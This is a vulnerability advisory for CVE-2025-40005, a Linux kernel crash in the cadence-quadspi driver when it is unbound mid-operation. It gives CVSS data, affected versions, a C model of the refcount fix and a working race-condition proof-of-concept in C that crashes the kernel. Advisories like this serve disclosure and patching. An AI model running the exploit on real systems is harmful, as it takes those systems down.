Security Vulnerability Report
CVE-2025-40005 CVSS 5.5 MEDIUM

CVE-2025-40005

Published: 2025-10-20 16:15:37
Last Modified: 2026-03-25 11:16:13
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

spi: cadence-quadspi: Implement refcount to handle unbind during busy

The driver supports indirect read and indirect write operations with the assumption that no forced device removal (unbind) operation occurs. However, forced device removal (unbind) is still available to the root superuser.

Unbinding the driver during an operation causes a kernel crash. This change ensures the driver is able to handle such an operation for indirect read and indirect write by implementing a refcount to track devices attached to the controller and gracefully wait until the attached devices' remove operation has completed before proceeding with the removal operation.
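The fix described above is a refcount-guarded teardown: every in-flight indirect operation holds a reference, and remove() does not release the controller until the count drains. The following is an added, user-space model of that pattern written for this page; it is not the kernel driver's code. The struct, the buffer standing in for the MMIO register window, and the function names are all assumptions made for the illustration. The real driver blocks in remove() until the count reaches zero; this single-threaded model instead returns -EBUSY and lets the last op_end() finish the teardown, so the same state transitions can be checked without threads.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

/* Hypothetical controller state for this example. The register window is a
 * heap buffer standing in for the ioremapped MMIO region remove() releases. */
struct qspi_ctrl {
    unsigned char *regs;   /* released by teardown */
    unsigned int inflight; /* refcount: indirect ops currently in progress */
    int removing;          /* unbind has been requested */
    int torn_down;         /* resources actually released */
};

static int ctrl_init(struct qspi_ctrl *c)
{
    memset(c, 0, sizeof(*c));
    c->regs = calloc(256, 1);
    return c->regs ? 0 : -ENOMEM;
}

static void ctrl_teardown(struct qspi_ctrl *c)
{
    free(c->regs);
    c->regs = NULL;
    c->torn_down = 1;
}

/* Take a reference before starting an indirect read/write. Refused once an
 * unbind is pending so no new work starts on a controller that is going away. */
static int op_begin(struct qspi_ctrl *c)
{
    if (c->removing)
        return -ENODEV;
    c->inflight++;
    return 0;
}

/* Complete the operation: touch the registers, drop the reference, and let the
 * last op out finish a deferred remove. Returns -EFAULT if the registers were
 * already released, the use-after-teardown the unpatched driver crashes on. */
static int op_end(struct qspi_ctrl *c)
{
    if (!c->regs)
        return -EFAULT;
    c->regs[0] = 1;                 /* stands in for a final register write */
    if (c->inflight)
        c->inflight--;
    if (c->removing && c->inflight == 0)
        ctrl_teardown(c);
    return 0;
}

/* Unpatched shape: release everything immediately, ignoring in-flight ops. */
static int remove_unpatched(struct qspi_ctrl *c)
{
    ctrl_teardown(c);
    return 0;
}

/* Patched shape: refuse new ops and release only once the refcount drains. */
static int remove_patched(struct qspi_ctrl *c)
{
    c->removing = 1;
    if (c->inflight == 0) {
        ctrl_teardown(c);
        return 0;
    }
    return -EBUSY;  /* deferred: the final op_end() completes the teardown */
}

/* Scenario: an indirect op is in flight when unbind arrives.
 * Returns what op_end() sees after the remove (-EFAULT for the bug). */
static int race_unpatched(void)
{
    struct qspi_ctrl c;
    if (ctrl_init(&c))
        return -ENOMEM;
    op_begin(&c);
    remove_unpatched(&c);   /* registers gone while the op still runs */
    return op_end(&c);
}

/* Same scenario with the refcount guard. Returns 0 only if the remove was
 * deferred, a new op was refused, and teardown happened after op_end(). */
static int race_patched(void)
{
    struct qspi_ctrl c;
    if (ctrl_init(&c))
        return -ENOMEM;
    op_begin(&c);
    if (remove_patched(&c) != -EBUSY)
        return 1;           /* should have been deferred */
    if (op_begin(&c) != -ENODEV)
        return 2;           /* no new work once removal is pending */
    if (op_end(&c) != 0)
        return 3;           /* last reference: completes the remove */
    if (!c.torn_down || c.regs != NULL)
        return 4;
    return 0;
}

int main(void)
{
    printf("unpatched: op_end after unbind -> %d (expect %d)\n",
           race_unpatched(), -EFAULT);
    printf("patched:   scenario result -> %d (expect 0)\n", race_patched());
    return 0;
}
```

The point to take from the model is the ordering: remove() must stop admitting new operations before it waits, and whatever completes the last operation must be the thing that finally releases the hardware mapping; a remove() that frees first and checks later is exactly the crash the advisory describes.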

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (from 5.9 up to, but excluding, 6.6.125)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (from 6.7 up to, but excluding, 6.16.10)
cpe:2.3:o:linux:linux_kernel:6.17:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.17:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.17:rc3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.17:rc4:*:*:*:*:*:* - VULNERABLE
Linux kernel 5.9 through 6.6.124 (the spi-cadence-quadspi range listed by NVD; 6.6.x is fixed from 6.6.125)
Linux kernel 6.7 through 6.16.9 (this range includes the 6.12.x series; 6.16.x is fixed from 6.16.10)
Linux kernel 6.17-rc1 through 6.17-rc4
Linux kernel stable branches before the referenced fix commits (for example commit 56787f4a75907ae99b5f5842b756fa68e2482f6d)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
Two caveats before running this. The unbind half of the race writes to the driver's sysfs unbind and bind files, which on a stock system needs root; that matches the description's "available to root superuser", even though the NVD vector scores PR:L. The read half only needs read access to the MTD device. The only outcome is the kernel crash the description mentions (availability impact); the PoC gives no code execution or data access. The driver directory and device name below are board-specific placeholders. Build with gcc -pthread.

c
// CVE-2025-40005 PoC - Trigger kernel crash via race condition
// between SPI indirect read/write and driver unbind
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <pthread.h>
#include <sys/ioctl.h>
#include <errno.h>

// SPI device path for cadence-quadspi controller
#define QSPI_DEVICE "/dev/mtd0" // MTD device backed by QSPI NOR flash
// Driver and device names are placeholders: check the directory names under
// /sys/bus/platform/drivers/ and the device entry listed inside the
// controller driver's directory on the target board.
#define QSPI_DRIVER_PATH "/sys/bus/platform/drivers/cdns-qspi"
#define QSPI_DEVICE_BIND "1f040000.spi"

// Thread function to continuously read from QSPI device
void *read_thread(void *arg)
{
    int fd;
    char buf[4096];

    (void)arg;
    while (1) {
        fd = open(QSPI_DEVICE, O_RDONLY);
        if (fd >= 0) {
            // Perform continuous reads to trigger indirect read operations
            lseek(fd, 0, SEEK_SET);
            read(fd, buf, sizeof(buf));
            close(fd);
        }
        usleep(100); // Small delay to increase race window
    }
    return NULL;
}

// Thread function to unbind and rebind the QSPI driver
void *unbind_thread(void *arg)
{
    int fd;
    char path[256];

    (void)arg;
    while (1) {
        // Unbind the controller while the reader thread keeps it busy
        snprintf(path, sizeof(path), "%s/unbind", QSPI_DRIVER_PATH);
        fd = open(path, O_WRONLY);
        if (fd >= 0) {
            write(fd, QSPI_DEVICE_BIND, strlen(QSPI_DEVICE_BIND));
            close(fd);
        }
        // Rebind for next iteration
        usleep(1000);
        snprintf(path, sizeof(path), "%s/bind", QSPI_DRIVER_PATH);
        fd = open(path, O_WRONLY);
        if (fd >= 0) {
            write(fd, QSPI_DEVICE_BIND, strlen(QSPI_DEVICE_BIND));
            close(fd);
        }
        usleep(1000);
    }
    return NULL;
}

int main(int argc, char *argv[])
{
    pthread_t t1, t2;

    (void)argc;
    (void)argv;
    printf("CVE-2025-40005 PoC - requires root privileges\n");
    if (geteuid() != 0) {
        fprintf(stderr, "Error: This PoC requires root privileges\n");
        return 1;
    }

    // Create threads to trigger race condition
    pthread_create(&t1, NULL, read_thread, NULL);
    pthread_create(&t2, NULL, unbind_thread, NULL);

    // Wait for kernel crash
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    return 0;
}

References

https://git.kernel.org/stable/c/56787f4a75907ae99b5f5842b756fa68e2482f6d
https://git.kernel.org/stable/c/65ed52200080eafce3eead05cf22ce01238defca
https://git.kernel.org/stable/c/7446284023e8ef694fb392348185349c773eefb3 (Patch)
https://git.kernel.org/stable/c/8df235f768cea7a5829cb02525622646eb0df5f5 (Patch)
https://git.kernel.org/stable/c/b7ec8a2b094a33d0464958c2cbf75b8f229098b0 (Patch)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-40005", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-20T16:15:37.127", "lastModified": "2026-03-25T11:16:12.737", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: cadence-quadspi: Implement refcount to handle unbind during busy\n\ndriver support indirect read and indirect write operation with\nassumption no force device removal(unbind) operation. However\nforce device removal(removal) is still available to root superuser.\n\nUnbinding driver during operation causes kernel crash. This changes\nensure driver able to handle such operation for indirect read and\nindirect write by implementing refcount to track attached devices\nto the controller and gracefully wait and until attached devices\nremove operation completed before proceed with removal operation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.9", "versionEndExcluding": "6.6.125", "matchCriteriaId": "A2F78819-3B3D-45F2-B2BC-445385A4FAE4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.16.10", 
"matchCriteriaId": "898CB0E7-69BE-48EB-A212-89F26E47CC47"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc1:*:*:*:*:*:*", "matchCriteriaId": "327D22EF-390B-454C-BD31-2ED23C998A1C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc2:*:*:*:*:*:*", "matchCriteriaId": "C730CD9A-D969-4A8E-9522-162AAF7C0EE9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc3:*:*:*:*:*:*", "matchCriteriaId": "39982C4B-716E-4B2F-8196-FA301F47807D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc4:*:*:*:*:*:*", "matchCriteriaId": "340BEEA9-D70D-4290-B502-FBB1032353B1"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/56787f4a75907ae99b5f5842b756fa68e2482f6d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/65ed52200080eafce3eead05cf22ce01238defca", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/7446284023e8ef694fb392348185349c773eefb3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8df235f768cea7a5829cb02525622646eb0df5f5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b7ec8a2b094a33d0464958c2cbf75b8f229098b0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}